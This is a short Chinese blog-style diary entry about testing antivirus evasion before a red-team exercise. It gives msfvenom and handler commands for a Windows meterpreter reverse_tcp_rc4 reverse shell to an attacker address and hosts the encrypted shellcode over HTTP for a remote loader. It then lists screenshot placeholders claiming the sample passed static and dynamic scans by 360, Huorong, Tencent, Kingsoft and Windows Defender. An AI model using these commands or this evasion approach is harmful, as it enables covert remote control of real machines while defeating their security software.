黑客学徒日记-hw前免杀测试

网络连接模式host-only:

受害机器:192.168.145.128

攻击机器:192.168.145.129

使用方法

监听器

handler -H 192.168.145.129 -P 2333 -p windows/x64/meterpreter/reverse_tcp_rc4

msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST=192.168.145.129 LPORT=2333 EXITFUNC=thread –smallest -f raw -o payload.bin

python3 -m http.server 80 #托管加密的shellcode

image-20220716114003971

image-20220716114701048

输入远程shellcode的地址,然后生成的样本: http://192.168.145.129/p

360杀毒 【静态+动态杀毒已过,断网测试】

image-20220716131902674

image-20220716132014741

火绒【静态+动态杀毒已过,断网测试】

更新时间

火绒的配置

进程列表

腾讯电脑管家,默认配置,不开启bitdefender【静态+动态杀毒已过,断网测试】

image-20220716151122844

静态查杀

image-20220716151506102

image-20220716151531712

腾讯电脑管家,默认配置,开启bitdefender【静态+动态杀毒已过,断网测试】

image-20220716154007107

image-20220716154129970

金山毒霸【静态+动态杀毒已过,断网测试】

image-20220716161147365

image-20220716161327096

image-20220716161408160

360 total security国际版【静态+动态杀毒已过,断网测试】

image-20220716170116416

image-20220716170328948

360安全卫士免杀测试【未开启核晶】

image-20220716162123080

image-20220716162430230

静态扫描无问题

image-20220716162948525

image-20220716163115965

image-20220716163151493

windows Defender【静态+动态杀毒已过,断网测试】

windows10企业版

静态扫描

image-20220720135451664

image-20220720135700685